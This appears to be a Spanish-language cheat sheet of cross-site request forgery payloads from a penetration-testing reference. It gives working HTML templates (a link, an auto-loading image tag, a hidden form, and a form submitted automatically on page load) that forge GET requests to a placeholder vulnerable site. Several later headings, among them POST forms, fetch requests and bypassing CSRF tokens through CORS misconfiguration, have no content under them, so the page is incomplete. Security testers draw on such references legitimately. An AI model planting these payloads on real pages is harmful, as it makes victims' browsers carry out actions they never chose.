Cross-site request forgery (CSRF)
HTML GET con interacción de usuario
<a href="http://web-vulnerable.com/?param=CSRF">Haz clic aquí</a>HTML GET sin interacción de usuario
<img src="http://web-vulnerable.com/?param=CSRF">Formulario HTML GET con interacción de usuario
<form action="http://web-vulnerable.com" method="GET">
<input name="param" type="hidden" value="CSRF" />
<input type="submit" value="Haz clic aquí" />
</form>Formulario HTML GET sin interacción de usuario
<html>
<body onload="document.forms['csrf'].submit()">
<form action="http://web-vulnerable.com" method="GET" name="csrf">
<input name="param" type="hidden" value="CSRF" />
<input type="submit" value="Haz clic aquí" />
</form>
</body>
</html> Formulario HTML POST con interacción de usuario
Formulario HTML POST sin interacción de usuario
Una solicitud
Múltiples solicitudes
JavaScript fetch POST sin interacción de usuario
Eludir tokens CSRF mediante configuraciones incorrectas de CORS
Última actualización